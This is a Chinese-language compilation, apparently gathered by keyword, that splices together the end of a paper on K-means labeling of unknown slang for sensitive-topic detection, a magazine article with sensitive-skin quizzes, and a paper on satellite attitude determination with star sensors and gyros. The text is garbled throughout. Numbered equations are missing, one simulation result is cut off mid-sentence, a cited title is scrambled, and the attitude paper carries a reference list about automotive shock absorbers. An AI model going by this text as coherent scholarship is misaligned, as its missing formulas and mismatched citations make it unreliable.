在使用K-means算法对文档集进行聚类以辅助标注未登录词类别时,可以通过误差平方和(Sum of Squares for Error,SSE)对模型进行求解。由于SSE是一个严格的梯度下降过程[86],假设误差平方和的优化目标函数为(5):
其中s是待聚类样本,x是当前的中心点样本,每次迭代过程寻找一个样本si的最优类簇,也就是对si求偏导,在第t轮迭代求解中使偏导为0,可得式(6)。
式(6)代表当前聚类的均值,也就是本轮迭代中的最优解或者说误差最小解。因此,保证fSSE函数在每一次迭代时,都单调非增,最终使SSE收敛。然而fSSE是一个非凸函数,所以无法保证K-means算法找到全局最优解,只能确保找到局部最优解。可以通过重复执行若干次K-means,选取fSSE最小值的方式,寻求聚类的近似最优解。
由于误差平方和函数对每一步的近似求解的时间复杂度为O(NM),其中N为待处理样本的个数,M为样本集的特征维度,所以当选择K个参考点求平均值时,经过T轮迭代的K-means算法的时间复杂度为O(TKNM)。由于求解未登录词辅助类别概率需要对每个类别的未登录词出现次数求和,所以求解类别概率辅助标注的时间复杂度为O(KM)。因此,基于K-means的未登录词辅助标注算法的时间复杂度O’’满足式(7)。
式(7)表明基于K-means的未登录词辅助标注算法的时间复杂度随文档数目和特征数据线性增长,理论上讲,算法的时间开销也是比较理想的。
3.2 未登录词处理的完整流程
提出的未登录词识别、选择和辅助标注三个方法的执行是顺序的,可以作为构成未登录词处理算法的子算法。算法的完整流程如其伪代码所示,如图3 所示。
通过以上流程,本文提出的未登录词处理算法可以实现从未登录词识别到未登录词选择到未登录词辅助类别标注的完整处理流程。在理论上,经过未登录词识别和辅助类别标注的文本,其敏感话题识别的效果应该更好。此外,通过理论分析,本文提出算法的时间复杂度较低,能够满足社交网络高实时性的处理要求。
4 实验
(1)实验数据与实验环境
为测试本文提出的辅助类别标注算法的功能与性能,实验部分将进行详细的测试、对比和分析。实验的语料来源于多方面,首先,通过对开源爬虫程序的改进,爬取了人人网状态签名栏文本20 万条、蔚蓝网图书评论6 万条、网易新闻跟帖6 万条、百度贴吧短文本6 万条、开放匿名访问权限的QQ空间短日志6 万条以及猫扑论坛留言文本6 万条。对于爬取的合计50 万个社交网络短文档,通过数据清洗、人工标注,形成了带敏感类别标注的训练文档集。其次,通过自然语言处理社区,如数据堂、NLP之家以及新浪数据挖掘微信群等机构和组织,获得带标注的社交网络短文本共计50 万篇。此外,还下载了北京大学中文分类语料库和搜狗实验室语料库的传统标注语料100 万篇作为辅助数据。实验部分数据共200 万篇,格式均为.txt结构的文本文档,数据量和数据格式符合此类实验的管理,满足实验所需的数据要求。
(2)未登录词类别辅助标注实验
为了减小实验的时间开销,实验的语料为随机挑选文档共计10 万篇。以识别出的未登录词“绿茶婊”为例,该未登录词在聚类A中共出现17 次,在聚类B中共出现4 次。经人工标注,类簇A为人身攻击类,类簇B为色情类,故绿茶婊的辅助类别标注为{人身攻击类,0.81;色情类,0.19}。
以未登录词中10 个有代表性的标注结果为例,标注效果如表1 所示。
未登录词辅助标注算法可以根据聚类的结果,以及未登录词在各类簇中出现的频率,辅助标注未登录词的类别,从而辅助提高敏感话题分类的准确率。
为了验证该算法对提高敏感话题识别准确率的有效性,首先对比处理对象为传统语料时,几种经典敏感话题分类方法基于未登录词辅助类别标注和不基于未登录词辅助类别标注时的准确率,以此来推断辅助标注对敏感话题识别性能提升是否有推动作用,实验结果如表2 所示。
表2 表明,相较于直接进行分类,各分类算法在未登录词类别辅助标注基础上的分类正确率均有一定程度的提升,由此可以推断,提出的未登录词辅助类别标注算法对提高敏感话题识别的性能有一定帮助。特别地,当以未登录词高密度出现的社交网络短文本为挖掘语料时,基于未登录词类别辅助标注的分类准确率提升更加明显,如表3 所示。
由表3 可见,对于社交网络短文本的敏感话题分类,通过未登录词类别辅助标注可以使各种算法的分类准确率平均提高3%以上,证明提出的未登录词类别辅助标注方法对提升敏感词识别的性能是有意义的。
5 小结
社交网络的敏感话题识别面临的首要问题就是频繁出现的未登录词对文本挖掘的影响。针对已有方法的优点和不足,本文提出基于文本聚类的未登录词类别辅助标注方法,通过文本聚类结果的人工标注和同一个未登录词在各类簇中出现次数的比例,为未登录词的类别打上了多维辅助标签,提高了文本分类的性能。
参考文献
[1]陈炯,张永奎.一种基于词聚类的文本特征描述方法[J].计算机系统应用,2005.
[2]陈浪舟,黄泰翼.一种新颖的词聚类算法和可变长统计语言模型[J].计算机学报,1999.
[3]Sajib Dasgupta and Vincent Ng,Mining Clustering Dimensions[C].Proceedings of the 27th International Conference on Machine Learning,Haifa,Israel,2010.
[4]Tomas Mikolov,Kai Chen,Greg Corrado,et al.Efficient on of Word Representations in Vector Estimati Space[OL].http://arxiv.org/pdf/1301.3781.pdf.
[5]田津,李敏强,陈富赞.基于三阶RBFNN学习算法的复杂样本分类研究[J].系统工程与电子技术,2000..
爱在敏感季节 篇11
说实在的,我从没觉得"敏感"是个不好的词,除了......除了当它延伸到我的皮肤上。
什么是敏感
每到换季的时候,特别是春天,皮肤就会给你制造一些麻烦:脱皮、泛红、发痒、甚至出现红斑、疹子。你的脸变得如此脆弱,是因为皮肤的天然防御系统出了问题,从而对外来的刺激失去了招架的能力,而皮肤的天然防御功能降低的第一个警讯就是皮脂膜遭受破坏。
健康的皮肤拥有一层天然的保护膜--皮脂膜,正常情况下含有约5~7%的油脂,20~30%的水分,呈弱酸性,不但能防止水分的过度蒸发,也能防止紫外线及空气污染的伤害。一旦皮脂膜遭受破坏,不但保水功能降低,使皮肤变得干燥、发痒,甚至脱皮,对冷热、触压的防御力亦跟着减弱,极易引起红肿、局部泛红等现象。这时如果操之过急,使用不当保养品,会刺激恶化,皮肤也变得更加脆弱不堪而特别敏感。
现在越来越多的人觉得自己的皮肤变敏感了,这是不是说明敏感肤质的人增加了呢还是让我们来辨析清楚吧
关键字:敏感
搜索结果:
1敏感性皮肤:指的是一种皮肤类型,皮肤呈薄而干燥状,角质层保水能力低,肌肤表面皮脂膜形成不完全,使刺激物质容易侵袭而导致肌肤问题。主要症状为发红瘙痒、烧灼刺痛感、起小疹子。它需要特别的保养程序和保养品护理。
2皮肤的敏感反应:是指皮肤对外界刺激所呈现的一种反应状态,并不单是敏感性皮肤,健康肌肤同样会因种种原因发生这样的问题。比如干燥、紫外线照射、疲劳、环境影响等都可能导致皮肤的敏感反应。
你是不是容易受伤的女人
你是天生脆弱的敏感性肌肤吗
1抹化妆水后肌肤常有刺痛感酒精过敏。
2使用高效保湿精华液会出现发痒刺痛现象保湿剂过敏。
3用了眼线、眼影等眼部彩妆后容易发炎起疹子。
4大多防晒用品无法使用紫外线吸收剂过敏。
5流汗后肌肤发痒刺痛。
6一用新化妆品皮肤就会出问题。
7过去1~2年内曾因使用化妆品而导致肌肤发炎出疹。
8一晒太阳脸就发红刺痛。
9肌肤平常容易起湿疹。
10每当季节变换时肌肤状况很不稳定,来月经之前或月经之间总伴随皮肤问题。
11已证明对花粉、金属或化学纤维之类物质过敏。
判断:如果你有5条以上答"是"的话,说明你是天生的敏感性肌肤,需要平时多加注意,并严格使用专门的敏感肌肤护肤品。
你不是敏感肌肤,但也可能成为受害者吗
1平时常不记得喝水,水分摄取不够。
2最近在生活或饮食习惯上有突然改变。
3刚刚来到一个新的工作单位或新住所。
4平时情绪不稳定,很容易紧张焦虑。
5总觉得工作或学业压力很大。
6习惯同时使用不同品牌的护肤品,对市场上新推出的化妆品总想做最早的尝试。
7正开始做以前没尝试过的特殊保养。
8刚换用一种新品牌护肤品。
9长期便秘。
10对皮肤的卸妆、清洁工作不是太注意,随便洗洗就算了。
11有暴饮暴食的习惯。
判断:如果你有5条以上答"是",那么即使你不是敏感性肌肤,也要多检讨自己的生活方式与保养习惯,不然随时都有可能遭受敏感反应的侵袭。
敏感信息 篇12
随着科学技术的发展,人类利用太空的任务需求对卫星姿态确定精度提出了更高的要求。星敏感器是姿态敏感器中精度最高的,且视场不受限制,不受轨道影响;但其提供的测量信号实时性不强。陀螺仪作为惯性测量元件在各种飞行器的惯性制导及姿态控制系统中应用最为广泛,有着自主性强、不受轨道影响、有限时间内精度高、实时性好的优点,但陀螺有漂移误差且随时间积累。可见选用星敏感器与陀螺组合进行姿态确定,取长补短,可实现高精度姿态确定[1,2]。
本文针对使用星敏感器获得双矢量观测信息的航天器姿态确定系统,对比研究了QUEST确定性算法以及星敏感器与陀螺组合的EKF算法[2,3,4] ,并进行了数学仿真,以寻求高精度的定姿方法。
1 坐标系及四元数姿态运动方程
定义地心惯性坐标系OIXIYIZI,原点为地心,XI轴指向春分点,ZI轴指向北极,YI轴在赤道面内,与XI轴、ZI轴构成右手直角坐标系。航天器体坐标系ObXbYbZb,原点为航天器质心,三条坐标轴与固定于航天器上的陀螺敏感轴平行。
惯性坐标系按Z→X→Y转动欧拉角ψ、θ、φ得到体坐标系,对应姿态四元数为
当配备有陀螺仪时,角速度可由陀螺测量得到;当无陀螺仪时,角速度由动力学方程传递,即
式(2)中J为航天器惯量张量,N为航天器所受合外力矩,式中所有量皆为在体坐标系下的表示。
2 航天器姿态信息的测量
假设星敏感器安装方向使星敏感器坐标系与航天器体坐标系重合。星敏感器测量模型可采用以下形式
rb=A(q)r0+Δrs (3)
式(3)中,rb为恒星在星体坐标系中的单位方向矢量,r0为恒星在惯性坐标系中的单位方向矢量,A(q)为姿态矩阵,Δrs为星敏感器测量误差,近似为高斯白噪声。
由之前体坐标系的定义,陀螺固连于航天器且体坐标系三轴与陀螺敏感轴平行。陀螺测量模型可采用以下形式
ωg=ω+b+d+ng;
式(4)中,ωg为角速度的陀螺测量值,ω为角速度真实值,b为陀螺常值漂移,d为陀螺相关漂移,描述为一阶马尔可夫过程,Dτ为相关时间常数对角矩阵,ng为陀螺测量噪声,nd为相关漂移噪声,两者皆近似为高斯白噪声。
3 星敏感器QUEST算法
本文中使用两个相同的星敏感器获得所需矢量观测。由星敏感器测量模型式(3),星光在参考坐标系内单位方向分别为r1、r2,其在体坐标系内测得的单位方向分别为rb1、rb2。基于Wahba提出的将姿态确定问题描述为求解最小二乘意义下的最优正交姿态矩阵问题,即求使损失函数
令
(5)
则最优姿态四元数为K矩阵的最大特征值所对应的特征向量[3]。
4 星敏感器与陀螺组合的EKF算法
将运动学方程式(1)线性化,采用Lefferts等人提出的体固连协方差表示法:四元数偏差量表示为估计四元数旋转到真实四元数的增量四元数,其标部接近于1,所有所需姿态信息包含于矢部三个量中[2]。
定义增量四元数为
微分得
令
整理为分部表达式并忽视二阶小量得
式(9)中
于是定义九维偏差状态向量及协方差矩阵
;
;
。 (10)
式(10)中
继而对其进行离散化,得到离散的状态方程
ΔXk=Φk/k-1ΔXk-1+Wk-1;
Φk/k-1≈I+F(tk-1)·ΔT (11)
Wk-1对应的等效系统噪声方差阵为
选取两个星敏感器三维测量值为观测量Z=[rTb1 rTb2]T,则有
(13)
线性化得
ΔZ(t)=H(t)ΔX(t)+V(t);
;
(14)
离散化得
δZk=HkδXk+Vk;
Hk=H(tk);
(15)
根据以上状态方程与观测方程,依EKF进行滤波[5],状态更新为
(16)
5 仿真及分析
选取如下参数与初始条件进行姿态确定算法的仿真验证:
星敏感器测量噪声标准差σs=1″,两个星敏感器光轴分别沿卫星体轴X轴和Y轴;陀螺仪测量白噪声标准差σg=0.1°/s,常值漂移b=5°/h,相关漂移斜率白噪声标准差σd=0.01°/h,相关时间常数矩阵Dτ=1/3 600I3×3 s-1。
星敏感器与陀螺组合滤波时,偏差协方差阵初始值P0=diag[1 1 1 10[1,2,3,4,5,6,7,8,9,10] 10-8 10-8 10-10 10-10 10-10]。
基于上述仿真条件及初始参数,应用VC6.0进行了星敏感器QUEST、星敏感器与陀螺组合的扩展卡尔曼滤波姿态确定算法的数值仿真,滤波步长为1 s,总时间为2 000 s。仿真结果见图1~图3。
仿真结果如下:
(1) QUEST算法的姿态角估计误差标准差约为
(2) 星敏感器与陀螺组合的滤波算法的姿态角估计误差标准差约为[0.50 0.50 0.38]″,姿态角速度估计误差标准差为[0.131 0.132 0.126]″/s。
通过仿真结果的比较,分析如下:
(1) 基于双矢量测量信息,QUEST算法沿星敏感器光轴方向的定姿精度与敏感器测量精度相当,沿垂直于光轴所在平面的方向(下称垂直轴)的定姿精度稍高(误差减小约30%),这是由于双矢量所包含的姿态信息在绕垂直轴方向更多所致;星敏感器与陀螺组合的扩展卡尔曼滤波算法同样存在定姿精度沿垂直轴方向比沿星敏感器光轴方向更高,但定姿整体精度较QUEST算法提升约一倍。
(2) 就滤波性能而言,星敏感器与陀螺组合的滤波算法能在数步内收敛至稳定值,估计量初始值的选取对姿态估计精度的影响较小。
(3) 星敏感器与陀螺组合的滤波算法可对陀螺漂移进行估计,估计精度与陀螺测量精度相当。
6 结论
本文针对使用星敏感器获得双矢量观测的三轴稳定卫星姿态确定系统,研究了基于星敏感器与陀螺组合的扩展卡尔曼滤波姿态确定算法,用星敏感器修正陀螺的漂移偏差,得到姿态与陀螺漂移的估计;研究了QUEST姿态确定算法,由星敏感器获得矢量观测量,由QUEST确定性算法求解姿态信息;并对两种方法进行分析比较。
通过对上述三种姿态确定算法进行的数值仿真,得到如下的结论:基于星敏感器获得矢量观测进行姿态确定时,采用星敏感器与陀螺组合的扩展卡尔曼滤波姿态确定,比确定性算法定姿精度更高,且具有良好的滤波收敛速度与稳定性。
参考文献
[1] Lang H. A study of the characteristics of automotive hydraulic dampers at high stroking frequency. PH.D. thesis, University of Michigan, 1977
[2] Reybrouck K. A nonlinear parametric model of an automotive shock absorber. SAE Technical Papers, 940869 , 1994
[3] Lee K. Numerical modelling for the hydraulic performance prediction of automotive monotube dampers. Veh Syst Dyn,1997;28:25—39
[4] Besinger F H,Cebon D, Cole D J. Damper models for heavy vehicle ride dynamics. Veh Syst Dyn,1995;24:35—64
[5] Lion A, Loose S. A thermomechanically coupled model for automotive shock absorbers: theory, experiments and vehicle simulations on test tracks. Veh Syst Dyn,2002;37:241—261
[6] Duym S,Stiens R, Reybrouck K. Evaluation of shock absorber models.Veh Syst Dyn,1997;27:109—127
[7] Patel A, Dunne J F. NARX neural network modelling of hydraulic suspension dampers for steady-state and variable temperature operation.Veh Syst Dyn,2003;40:285—328
[8] Vapnik V N. Statistical learning theory. Johnwiley & Sons. New York, 1998
[9] Schölkopf B, Smola A J, Williamson R C, et al. New support vector algorithms. Neural Comput,2000;12:1207—1245
[10] Flake G W, Lawrence S. Efficient SVM regression training with SMO. Mach Learn,2002; 46:271—290
[11] http://www.mathworks.com/help/